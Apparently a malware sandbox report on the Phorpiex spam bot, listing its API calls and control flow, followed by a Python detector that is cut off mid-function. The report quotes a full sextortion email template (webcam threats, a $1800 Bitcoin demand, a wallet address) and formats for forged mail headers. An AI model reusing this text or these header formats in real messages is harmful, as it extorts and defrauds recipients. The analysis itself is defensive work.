                                                                                • Instruction Fuzzy Hash: AD112175A90308BBEB10DF90DD4AF9DB778AB16B11F204115FA096F2C0DBB1AA148B65

                                                                                 Control-flow Graph

                                                                                 • Basic blocks: 141: 2a1790-2a17b4 (InternetOpenA); 142: 2a1828-2a1839 (Sleep); 143: 2a17b6-2a17d3 (InternetOpenUrlA); 144: 2a181e-2a1822 (InternetCloseHandle); 145: 2a17d5-2a17fc (HttpQueryInfoA); 146: 2a17fe-2a1806; 147: 2a1814-2a1818 (InternetCloseHandle); 148: 2a1808-2a1810
                                                                                 • Edges: 141->142, 141->143, 143->144, 143->145, 144->142, 145->146, 145->147, 146->147, 146->148, 147->144, 148->147
                                                                                APIs
                                                                                • InternetOpenA.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36,00000001,00000000,00000000,00000000), ref: 002A17A7
                                                                                • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 002A17C6
                                                                                • HttpQueryInfoA.WININET(00000000,20000005,?,00000004,00000000), ref: 002A17EF
                                                                                • InternetCloseHandle.WININET(00000000), ref: 002A1818
                                                                                • InternetCloseHandle.WININET(00000000), ref: 002A1822
                                                                                • Sleep.KERNEL32(000003E8), ref: 002A182D
                                                                                Strings
                                                                                • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36, xrefs: 002A17A2
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1846603424.00000000002A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 002A0000, based on PE: true
                                                                                 • Associated: 00000009.00000002.1846589371.00000000002A0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                 • Associated: 00000009.00000002.1846619040.00000000002A3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                 • Associated: 00000009.00000002.1846673406.00000000002A6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_2a0000_winploravr.jbxd
                                                                                Similarity
                                                                                • API ID: Internet$CloseHandleOpen$HttpInfoQuerySleep
                                                                                • String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
                                                                                • API String ID: 2743515581-173034443
                                                                                • Opcode ID: dd08256abb87a38a1370cae91ac6d218b0de16c8d5fac229e77477a31ddbf496
                                                                                • Instruction ID: 8572b958d8859f3caa8a2f87886d042604509b31cf541c7cd445d655d2942110
                                                                                • Opcode Fuzzy Hash: dd08256abb87a38a1370cae91ac6d218b0de16c8d5fac229e77477a31ddbf496
                                                                                • Instruction Fuzzy Hash: EC210A75E40208FFEB10DFA4DC49F9EB7B5AB09705F108498FA15AB2C0CBB56A14CB61

                                                                                Callgraph

                                                                                 • Calls (caller -> callees):
                                                                                 • Function_00D72A55 -> Function_00D72EA1
                                                                                 • Function_00D717D0 -> Function_00D71400, Function_00D718B0
                                                                                 • Function_00D728C7 -> Function_00D72E5C, Function_00D72D90, Function_00D72EA1, Function_00D72720
                                                                                 • Function_00D71C7C -> Function_00D711C0, Function_00D71160, Function_00D71120
                                                                                 • Function_00D719E0 -> Function_00D711C0, Function_00D71160, Function_00D72300, Function_00D710A0
                                                                                 • Function_00D71760 -> Function_00D716E0
                                                                                 • Function_00D716E0 -> Function_00D71440
                                                                                 • Function_00D71160 -> Function_00D71230
                                                                                 • Function_00D72BE8 -> Function_00D72E5C, Function_00D72C84, Function_00D72EA1
                                                                                 • Function_00D72292 -> Function_00D711C0, Function_00D71160, Function_00D71120
                                                                                 • Function_00D72A91 -> Function_00D72EA1
                                                                                 • Function_00D72D90 -> Function_00D72D40, Function_00D72D00
                                                                                 • Function_00D72B87 -> Function_00D72F08
                                                                                 • Function_00D72881 -> Function_00D72C8D
                                                                                 • Function_00D72C8D -> Function_00D72BE8
                                                                                 • Function_00D71BB6 -> Function_00D711C0, Function_00D71160, Function_00D71120
                                                                                 • Function_00D72430 -> Function_00D717D0, Function_00D718D0, Function_00D726E0
                                                                                 • Function_00D71C27 -> Function_00D711C0, Function_00D71160, Function_00D71120
                                                                                 • Function_00D72AA6 -> Function_00D72EDA, Function_00D72F05, Function_00D72CA4
                                                                                 • Function_00D710A0 -> Function_00D71440
                                                                                 • Function_00D72720 -> Function_00D71760, Function_00D71000
                                                                                 • Function_00D72320 -> Function_00D719E0, Function_00D71400, Function_00D718B0
                                                                                 • Function_00D71B2D -> Function_00D711C0, Function_00D71160, Function_00D71120
                                                                                 • Function_00D71CAB -> Function_00D711C0, Function_00D71160, Function_00D71390, Function_00D71490, Function_00D71120, Function_00D71320
                                                                                 • Functions with no recorded call edges: Function_00D71756, Function_00D726D2, Function_00D72BDE, Function_00D72FD8, Function_00D72A41, Function_00D72FC0, Function_00D72CCA, Function_00D71470, Function_00D72B91, Function_00D7121D, Function_00D72E1B, Function_00D72A8D, Function_00D72EB5, Function_00D72FBD, Function_00D72424, Function_00D72E2F

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • Sleep.KERNELBASE(000007D0), ref: 00D7272E
                                                                                • CreateMutexA.KERNELBASE(00000000,00000000,4463464*), ref: 00D7273D
                                                                                • GetLastError.KERNEL32 ref: 00D72749
                                                                                • ExitProcess.KERNEL32 ref: 00D72758
                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00D72776
                                                                                • wsprintfW.USER32 ref: 00D7278F
                                                                                • DeleteFileW.KERNELBASE(?), ref: 00D7279F
                                                                                • WSAStartup.WS2_32(00000202,?), ref: 00D727B1
                                                                                • ExitProcess.KERNEL32 ref: 00D727C5
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2105995943.0000000000D71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00D70000, based on PE: true
                                                                                 • Associated: 0000000A.00000002.2105981650.0000000000D70000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000A.00000002.2106010574.0000000000D74000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000A.00000002.2106024579.0000000000D76000.00000004.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000A.00000002.2106048378.0000000000D78000.00000002.00000001.01000000.0000000B.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_d70000_2006625995.jbxd
                                                                                Similarity
                                                                                • API ID: ExitFileProcess$CreateDeleteErrorLastModuleMutexNameSleepStartupwsprintf
                                                                                • String ID: %s:Zone.Identifier$4463464*
                                                                                • API String ID: 3138769648-2805003198
                                                                                • Opcode ID: 53df50657f0e002e8b0dea3b35a54845ce2534f6b801dbe9665ae803fcf2d7db
                                                                                • Instruction ID: 210940c09b7c4dd08c64f15eb83cdc5dd3e722589298b2a955ba8662ce84c9d4
                                                                                • Opcode Fuzzy Hash: 53df50657f0e002e8b0dea3b35a54845ce2534f6b801dbe9665ae803fcf2d7db
                                                                                • Instruction Fuzzy Hash: E4218071A40318ABE7215BA0DC0EFA97739EB14B02F408054FB0DE52D1FBB059C88E71

                                                                                Control-flow Graph

                                                                                 Nodes (basic block address range, APIs called):
                                                                                 • 12: d71760-d7178a DnsQuery_A
                                                                                 • 13: d717bf-d717ca DnsFree
                                                                                 • 14: d7178c-d71795 call d716e0
                                                                                 • 16: d717cc-d717cf
                                                                                 • 17: d7179a-d717a4
                                                                                 • 18: d717a6-d717bd DnsFree closesocket
                                                                                 Edges: 12->13, 12->14, 13->16, 14->17, 17->13, 17->18, 18->16
                                                                                APIs
                                                                                • DnsQuery_A.DNSAPI(yahoo.com,0000000F,00000000,00000000,00000000,00000000), ref: 00D7177E
                                                                                • DnsFree.DNSAPI(00000000,00000001), ref: 00D717AC
                                                                                • closesocket.WS2_32(00000000), ref: 00D717B5
                                                                                • DnsFree.DNSAPI(00000000,00000001), ref: 00D717C5
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2105995943.0000000000D71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00D70000, based on PE: true
                                                                                 • Associated: 0000000A.00000002.2105981650.0000000000D70000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000A.00000002.2106010574.0000000000D74000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000A.00000002.2106024579.0000000000D76000.00000004.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000A.00000002.2106048378.0000000000D78000.00000002.00000001.01000000.0000000B.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_d70000_2006625995.jbxd
                                                                                Similarity
                                                                                • API ID: Free$Query_closesocket
                                                                                • String ID: yahoo.com
                                                                                • API String ID: 1946217314-667638125
                                                                                • Opcode ID: dd0ec95c6355247bd530b173eede6df7573a2c5c5fa60f895911a490ae20bf03
                                                                                • Instruction ID: 2f484909901752c65e2b7dc7482c558af32d5924a8b4a66a8f5a521a5a116bae
                                                                                • Opcode Fuzzy Hash: dd0ec95c6355247bd530b173eede6df7573a2c5c5fa60f895911a490ae20bf03
                                                                                • Instruction Fuzzy Hash: F9011279E40308FBDB10EFE4D946B9D7778AB44704F20C199E6046B281E7769A45EB70

                                                                                Control-flow Graph

                                                                                 Nodes (basic block address range, APIs called):
                                                                                 • 19: d716e0-d716f9 call d71440
                                                                                 • 22: d71700-d71731 htons socket
                                                                                 • 23: d716fb-d716fe
                                                                                 • 24: d7175b-d7175e
                                                                                 • 25: d71733-d71738
                                                                                 • 26: d7173a-d7174d connect
                                                                                 • 27: d7174f-d71754
                                                                                 • 28: d71758
                                                                                 Edges: 19->22, 19->23, 22->25, 22->26, 23->24, 25->24, 26->27, 26->28, 27->24, 28->24
                                                                                APIs
                                                                                  • Part of subcall function 00D71440: inet_addr.WS2_32(00D710D9), ref: 00D7144A
                                                                                  • Part of subcall function 00D71440: gethostbyname.WS2_32(?), ref: 00D7145D
                                                                                • htons.WS2_32(?), ref: 00D71714
                                                                                • socket.WS2_32(00000002,00000001,00000006), ref: 00D71724
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2105995943.0000000000D71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00D70000, based on PE: true
                                                                                 • Associated: 0000000A.00000002.2105981650.0000000000D70000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000A.00000002.2106010574.0000000000D74000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000A.00000002.2106024579.0000000000D76000.00000004.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000A.00000002.2106048378.0000000000D78000.00000002.00000001.01000000.0000000B.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_d70000_2006625995.jbxd
                                                                                Similarity
                                                                                • API ID: gethostbynamehtonsinet_addrsocket
                                                                                • String ID:
                                                                                • API String ID: 230923099-0
                                                                                • Opcode ID: cda45da48dcbf4e36c5c405dc04883787ffe7fe767adb51bb6535c10018e3224
                                                                                • Instruction ID: 258a6a5469329147987c577d9317b155a471a68a331859ae94cf30ed14cad416
                                                                                • Opcode Fuzzy Hash: cda45da48dcbf4e36c5c405dc04883787ffe7fe767adb51bb6535c10018e3224
                                                                                • Instruction Fuzzy Hash: 56017178D00308EBCB14DBB8D84AABD7B75AF14334F608355F929A72D0F7708A8197A1

                                                                                Control-flow Graph

                                                                                 Nodes (basic block address range, APIs called):
                                                                                 • 29: d71440-d71457 inet_addr
                                                                                 • 30: d7147f
                                                                                 • 31: d71459-d7146a gethostbyname
                                                                                 • 32: d71472-d7147c
                                                                                 • 33: d7146c-d7146e
                                                                                 • 34: d71482-d71485
                                                                                 Edges: 29->30, 29->31, 30->34, 31->32, 31->33, 32->30, 33->34
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2105995943.0000000000D71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00D70000, based on PE: true
                                                                                 • Associated: 0000000A.00000002.2105981650.0000000000D70000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000A.00000002.2106010574.0000000000D74000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000A.00000002.2106024579.0000000000D76000.00000004.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000A.00000002.2106048378.0000000000D78000.00000002.00000001.01000000.0000000B.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_d70000_2006625995.jbxd
                                                                                Similarity
                                                                                • API ID: gethostbynameinet_addr
                                                                                • String ID:
                                                                                • API String ID: 1594361348-0
                                                                                • Opcode ID: a5664c391f6302b378dca007edf067b6ea1960b4c15510aa6751012ae3eb3c8f
                                                                                • Instruction ID: 3bb3765b20d07d84f931cfd16b8379c68c787e43f14ac85f51957176909d3f9c
                                                                                • Opcode Fuzzy Hash: a5664c391f6302b378dca007edf067b6ea1960b4c15510aa6751012ae3eb3c8f
                                                                                • Instruction Fuzzy Hash: 1AF09E78900308EFCB10DFB4D54499DBBB5EB59315F60C795DD5997350E7309A80DB90

                                                                                Control-flow Graph

                                                                                 Nodes (basic block address range, APIs called):
                                                                                 • 193: d71490-d71522
                                                                                 • 194: d71524-d7152e GetLocalTime
                                                                                 • 195: d71530-d7154c FileTimeToLocalFileTime FileTimeToSystemTime
                                                                                 • 196: d71552-d71579 GetTimeZoneInformation
                                                                                 • 197: d71584-d7158c
                                                                                 • 198: d7157b-d71581
                                                                                 • 199: d7158e-d71597
                                                                                 • 200: d71599-d7159e
                                                                                 • 201: d715a4-d715b4
                                                                                 • 202: d715b6-d715bb
                                                                                 • 203: d715bf-d715c5
                                                                                 • 204: d715c7-d715cc
                                                                                 • 205: d715d0-d715d7
                                                                                 • 206: d715e2-d715e6
                                                                                 • 207: d715d9-d715de
                                                                                 • 208: d71659-d7165d
                                                                                 • 209: d715e8-d715ec
                                                                                 • 210: d715ee-d715f8
                                                                                 • 211: d715fa
                                                                                 • 212: d7165f-d71669
                                                                                 • 213: d7166b
                                                                                 • 214: d71604-d71657 wsprintfA
                                                                                 • 215: d71675-d716ce wsprintfA
                                                                                 • 216: d716d1-d716d4
                                                                                 Edges: 193->194, 193->195, 194->196, 195->196, 196->197, 196->198, 197->199, 197->200, 198->197, 199->201, 200->201, 201->202, 201->203, 202->203, 203->204, 203->205, 204->205, 205->206, 205->207, 206->208, 206->209, 207->206, 208->212, 208->213, 209->210, 209->211, 210->214, 211->214, 212->215, 213->215, 214->216, 215->216
                                                                                APIs
                                                                                • GetLocalTime.KERNEL32(?), ref: 00D71528
                                                                                • FileTimeToLocalFileTime.KERNEL32(00000000,?), ref: 00D7153B
                                                                                • FileTimeToSystemTime.KERNEL32(?,?), ref: 00D7154C
                                                                                • GetTimeZoneInformation.KERNEL32(00000000), ref: 00D71563
                                                                                • wsprintfA.USER32 ref: 00D7164E
                                                                                • wsprintfA.USER32 ref: 00D716C8
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2105995943.0000000000D71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00D70000, based on PE: true
                                                                                 • Associated: 0000000A.00000002.2105981650.0000000000D70000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000A.00000002.2106010574.0000000000D74000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000A.00000002.2106024579.0000000000D76000.00000004.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000A.00000002.2106048378.0000000000D78000.00000002.00000001.01000000.0000000B.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_d70000_2006625995.jbxd
                                                                                Similarity
                                                                                • API ID: Time$File$Localwsprintf$InformationSystemZone
                                                                                • String ID: %s, %u %s %u %.2u:%.2u:%.2u %s%.2u%.2u$%u %s %u %.2u:%.2u:%.2u %s%.2u%.2u$Apr$Aug$Dec$Feb$Fri$Jan$Jul$Jun$Mar$May$Mon$Nov$Oct$Sat$Sep$Sun$Thu$Tue$Wed
                                                                                • API String ID: 1439763326-1766317088
                                                                                • Opcode ID: 13b3e85dde54326ccc04ac7d1772e64c60eae4e8b429a760e254f9c104042fd0
                                                                                • Instruction ID: 8f4613da2e142642a24ef9086d414da86282202c10973488b6d2fd83c52c68c8
                                                                                • Opcode Fuzzy Hash: 13b3e85dde54326ccc04ac7d1772e64c60eae4e8b429a760e254f9c104042fd0
                                                                                • Instruction Fuzzy Hash: F161D4B4900258DBCB15CFC9D844AEEBBB9BF88305F508149E549AB254E7788A94CB74

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • InternetOpenA.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36,00000000,00000000,00000000,00000000), ref: 00D717E3
                                                                                • InternetOpenUrlA.WININET(00000000,http://icanhazip.com/,00000000,00000000,00000000,00000000), ref: 00D71807
                                                                                • InternetReadFile.WININET(00000000,?,00000063,?), ref: 00D71824
                                                                                  • Part of subcall function 00D718B0: strstr.MSVCR90 ref: 00D718BB
                                                                                • wsprintfA.USER32 ref: 00D71860
                                                                                • wsprintfA.USER32 ref: 00D71875
                                                                                • InternetCloseHandle.WININET(00000000), ref: 00D71882
                                                                                • wsprintfA.USER32 ref: 00D71894
                                                                                • InternetCloseHandle.WININET(?), ref: 00D718A1
                                                                                Strings
                                                                                • http://icanhazip.com/, xrefs: 00D717FE
                                                                                • [0.0.0.0], xrefs: 00D7188A
                                                                                • [0.0.0.0], xrefs: 00D7186B
                                                                                • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36, xrefs: 00D717DE
                                                                                • [%s], xrefs: 00D71856
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2105995943.0000000000D71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00D70000, based on PE: true
                                                                                 • Associated: 0000000A.00000002.2105981650.0000000000D70000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000A.00000002.2106010574.0000000000D74000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000A.00000002.2106024579.0000000000D76000.00000004.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000A.00000002.2106048378.0000000000D78000.00000002.00000001.01000000.0000000B.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_d70000_2006625995.jbxd
                                                                                Similarity
                                                                                • API ID: Internet$wsprintf$CloseHandleOpen$FileReadstrstr
                                                                                • String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36$[%s]$[0.0.0.0]$[0.0.0.0]$http://icanhazip.com/
                                                                                • API String ID: 2936383407-4046155809
                                                                                • Opcode ID: 6393a6612f17b26e5013ce7fad83e4e1063b8735c0cf9de21c461a2b96a7ba0a
                                                                                • Instruction ID: 5490b44259465630daea361d3468a352239e9c9993f2d9c95b807c0b5654e260
                                                                                • Opcode Fuzzy Hash: 6393a6612f17b26e5013ce7fad83e4e1063b8735c0cf9de21c461a2b96a7ba0a
                                                                                • Instruction Fuzzy Hash: D6214175A80304ABD711ABF8DC0AF9D7B34AB14B05F648618F90DA7281F7709548CB75

                                                                                Control-flow Graph

                                                                                APIs
                                                                                  • Part of subcall function 00D71320: GetTickCount.KERNEL32 ref: 00D7132A
                                                                                  • Part of subcall function 00D71320: srand.MSVCR90 ref: 00D71331
                                                                                  • Part of subcall function 00D71320: rand.MSVCR90 ref: 00D71353
                                                                                  • Part of subcall function 00D71320: sprintf.MSVCR90 ref: 00D7136E
                                                                                • wsprintfA.USER32 ref: 00D71CC9
                                                                                  • Part of subcall function 00D71490: GetLocalTime.KERNEL32(?), ref: 00D71528
                                                                                  • Part of subcall function 00D71490: GetTimeZoneInformation.KERNEL32(00000000), ref: 00D71563
                                                                                  • Part of subcall function 00D71490: wsprintfA.USER32 ref: 00D7164E
                                                                                • Sleep.KERNEL32(000007D0), ref: 00D71CEA
                                                                                  • Part of subcall function 00D71490: FileTimeToLocalFileTime.KERNEL32(00000000,?), ref: 00D7153B
                                                                                  • Part of subcall function 00D71490: FileTimeToSystemTime.KERNEL32(?,?), ref: 00D7154C
                                                                                • rand.MSVCR90 ref: 00D71D11
                                                                                • rand.MSVCR90 ref: 00D71D22
                                                                                • rand.MSVCR90 ref: 00D71D33
                                                                                • rand.MSVCR90 ref: 00D71D44
                                                                                  • Part of subcall function 00D71390: rand.MSVCR90 ref: 00D713A0
                                                                                  • Part of subcall function 00D71390: rand.MSVCR90 ref: 00D713CD
                                                                                • wsprintfA.USER32 ref: 00D71D73
                                                                                  • Part of subcall function 00D71120: lstrlenA.KERNEL32(?), ref: 00D7112D
                                                                                  • Part of subcall function 00D71120: send.WS2_32(?,?,000000FF,00000000), ref: 00D71144
                                                                                • wsprintfA.USER32 ref: 00D71DE3
                                                                                • shutdown.WS2_32(000000FF,00000002), ref: 00D722C3
                                                                                • closesocket.WS2_32(000000FF), ref: 00D722CD
                                                                                Strings
                                                                                • After that I removed my malware to not leave any traces., xrefs: 00D720B0
                                                                                • https://nexo.com/buy-crypto/bitcoin-btc, xrefs: 00D72177
                                                                                • Mime-Version: 1.0, xrefs: 00D71FB6
                                                                                • Unfortunately, there are some bad news for you., xrefs: 00D72024
                                                                                • My Bitcoin (BTC) address is: 19Y9VkeeSUNgqm6qbSy6Zkpk9oHaS3eHXT, xrefs: 00D721EF
                                                                                • https://paybis.com/, xrefs: 00D7219F
                                                                                • Everything will be carried out based on fairness., xrefs: 00D7223F
                                                                                • After that send the Bitcoin (BTC) directly to my wallet, or install the free software: Atomicwallet, or: Exodus wallet, then receive and send to mine., xrefs: 00D721DB
                                                                                • Yes, that's how the address looks like, copy and paste my address, it's (cAsE-sEnSEtiVE)., xrefs: 00D72203
                                                                                • https://cex.io/buy-bitcoins, xrefs: 00D72163
                                                                                • Received: from %s ([%d.%d.%d.%d]) by %s with MailEnable ESMTP; %s, xrefs: 00D71D67
                                                                                • As I got access to this email account, I will know if this email has already been read., xrefs: 00D7222B
                                                                                • All you need is $1800 USD in Bitcoin (BTC) transfer to my account., xrefs: 00D720D8
                                                                                • Or simply google other exchanger., xrefs: 00D721C7
                                                                                • Date: %s, xrefs: 00D71EFF
                                                                                • My trojan allowed me to access your files, accounts and your camera., xrefs: 00D7204C
                                                                                • From: %s, xrefs: 00D71E20
                                                                                • Hello there!, xrefs: 00D72010
                                                                                • You truly enjoy checking out porn websites and watching dirty videos, while having a lot of kinky fun., xrefs: 00D72088
                                                                                • Be sure, I keep my promises., xrefs: 00D7213B
                                                                                • You can easily buy Bitcoin (BTC) here:, xrefs: 00D7214F
                                                                                • Content-type: text/plain;, xrefs: 00D71FD9
                                                                                • Some time ago your device was infected with my private trojan, R.A.T (Remote Administration Tool), if you want to find out more about it simply use Google., xrefs: 00D72038
                                                                                • After the transaction is successful, I will proceed to delete everything., xrefs: 00D720EC
                                                                                • If you still doubt my serious intentions, it only takes couple mouse clicks to share the video of you with your friends, relatives, all email contacts, on social networks, the darknet and to publish all your files., xrefs: 00D720C4
                                                                                • https://bitpay.com/buy-bitcoin/?crypto=BTC, xrefs: 00D7218B
                                                                                • Received: (qmail %s invoked by uid %s); %s, xrefs: 00D71DD7
                                                                                • I RECORDED YOU!, xrefs: 00D71EAE
                                                                                • An advice from me, regularly change all your passwords to your accounts and update your device with newest security patches.., xrefs: 00D72253
                                                                                • To: %s, xrefs: 00D71E69
                                                                                • I RECORDED YOU (through your camera) SATISFYING YOURSELF!, xrefs: 00D7209C
                                                                                • %s.com, xrefs: 00D71CBD
                                                                                • Subject: %s, xrefs: 00D71EB3
                                                                                • You are given not more than 3 days after you have opened this email., xrefs: 00D72217
                                                                                • https://invity.io/buy-crypto, xrefs: 00D721B3
                                                                                • Check the sender of this email, I have sent it from your email account., xrefs: 00D72060
                                                                                • To make sure you read this email, you will receive it multiple times., xrefs: 00D72074
                                                                                • Message-ID: <%s.%s@%s>, xrefs: 00D71F6F
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2105995943.0000000000D71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00D70000, based on PE: true
                                                                                 • Associated: 0000000A.00000002.2105981650.0000000000D70000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000A.00000002.2106010574.0000000000D74000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000A.00000002.2106024579.0000000000D76000.00000004.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000A.00000002.2106048378.0000000000D78000.00000002.00000001.01000000.0000000B.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_d70000_2006625995.jbxd
                                                                                Similarity
                                                                                • API ID: rand$Time$wsprintf$File$Local$CountInformationSleepSystemTickZoneclosesocketlstrlensendshutdownsprintfsrand
• String ID: %s.com$After that I removed my malware to not leave any traces.$After that send the Bitcoin (BTC) directly to my wallet, or install the free software: Atomicwallet, or: Exodus wallet, then receive and send to mine.$After the transaction is successful, I will proceed to delete everything.$All you need is $1800 USD in Bitcoin (BTC) transfer to my account.$An advice from me, regularly change all your passwords to your accounts and update your device with newest security patches..$As I got access to this email account, I will know if this email has already been read.$Be sure, I keep my promises.$Check the sender of this email, I have sent it from your email account.$Content-type: text/plain;$Date: %s$Everything will be carried out based on fairness.$From: %s$Hello there!$I RECORDED YOU (through your camera) SATISFYING YOURSELF!$I RECORDED YOU!$If you still doubt my serious intentions, it only takes couple mouse clicks to share the video of you with your friends, relatives, all email contacts, on social networks, the darknet and to publish all your files.$Message-ID: <%s.%s@%s>$Mime-Version: 1.0$My Bitcoin (BTC) address is: 19Y9VkeeSUNgqm6qbSy6Zkpk9oHaS3eHXT$My trojan allowed me to access your files, accounts and your camera.$Or simply google other exchanger.$Received: (qmail %s invoked by uid %s); %s$Received: from %s ([%d.%d.%d.%d]) by %s with MailEnable ESMTP; %s$Some time ago your device was infected with my private trojan, R.A.T (Remote Administration Tool), if you want to find out more about it simply use Google.$Subject: %s$To make sure you read this email, you will receive it multiple times.$To: %s$Unfortunately, there are some bad news for you.$Yes, that's how the address looks like, copy and paste my address, it's (cAsE-sEnSEtiVE).$You are given not more than 3 days after you have opened this email.$You can easily buy Bitcoin (BTC) here:$You truly enjoy checking out porn websites and watching dirty videos, while having a lot of kinky fun.$https://bitpay.com/buy-bitcoin/?crypto=BTC$https://cex.io/buy-bitcoins$https://invity.io/buy-crypto$https://nexo.com/buy-crypto/bitcoin-btc$https://paybis.com/
                                                                                • API String ID: 1336957093-1075224888
                                                                                • Opcode ID: f693e9aad8c8987cbde2dd0505fd5e459a6c6c21abfd91df18f15850af5ea3c1
                                                                                • Instruction ID: 60083417c52918bb7be43fe4187682400ab5f2589ccbbb7b9ac812e9862f0ee2
                                                                                • Opcode Fuzzy Hash: f693e9aad8c8987cbde2dd0505fd5e459a6c6c21abfd91df18f15850af5ea3c1
                                                                                • Instruction Fuzzy Hash: 80F1B4B2D40218ABDB14DB94DC42FFE7339AF58305F088698F90C66181F7B59A988F75
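The String ID list above is the complete sextortion template the spam routine assembles with wsprintf: two forged trace headers (a MailEnable hop with a literal IPv4 and a qmail hop), a Message-ID of the form <%s.%s@%s>, the BTC wallet and the exchanger URLs. The following detector turns those strings into mail-filter indicators and scores a message on them. It is an added example, not code from the Joe Sandbox report; the weights, the threshold and the two sample messages are constructed here for illustration, and only the indicator strings themselves come from the report.

```python
"""Indicators of the Phorpiex sextortion template, taken from the String ID
list of the routine above.  Added example, not code from the sandbox report;
the scoring weights, the threshold and the sample messages are constructed."""
import re
from email import message_from_string

# Lifted verbatim from the report's string table.
BTC_WALLET = "19Y9VkeeSUNgqm6qbSy6Zkpk9oHaS3eHXT"
PAYMENT_URLS = (
    "https://bitpay.com/buy-bitcoin/?crypto=BTC",
    "https://cex.io/buy-bitcoins",
    "https://invity.io/buy-crypto",
    "https://nexo.com/buy-crypto/bitcoin-btc",
    "https://paybis.com/",
)
BODY_PHRASES = (
    "I RECORDED YOU",
    "R.A.T (Remote Administration Tool)",
    "$1800 USD in Bitcoin (BTC)",
    "not more than 3 days after you have opened this email",
    "I have sent it from your email account",
)

# The bot forges two trace headers:
#   Received: from %s ([%d.%d.%d.%d]) by %s with MailEnable ESMTP; %s
#   Received: (qmail %s invoked by uid %s); %s
RE_MAILENABLE = re.compile(
    r"^from \S+ \(\[\d{1,3}(?:\.\d{1,3}){3}\]\) by \S+ with MailEnable ESMTP; ")
RE_QMAIL = re.compile(r"^\(qmail \d+ invoked by uid \d+\); ")
# Message-ID: <%s.%s@%s>, i.e. two dot-separated tokens before the @.  Many
# legitimate MTAs produce the same shape, so this indicator gets little weight.
RE_MSGID = re.compile(r"^<[^.@<>\s]+\.[^.@<>\s]+@[^@<>\s]+>$")

# Constructed weights (not from the report): forged hops and wallet are specific.
WEIGHTS = {"mailenable_hop": 3, "qmail_hop": 2, "msgid_shape": 1, "btc_wallet": 5}


def sextortion_indicators(raw_message: str) -> dict:
    """Parse one RFC 5322 message and report which template markers it carries."""
    msg = message_from_string(raw_message)
    body = msg.get_payload() if not msg.is_multipart() else ""
    text = (msg.get("Subject") or "") + "\n" + body
    received = [h.strip() for h in msg.get_all("Received", [])]
    return {
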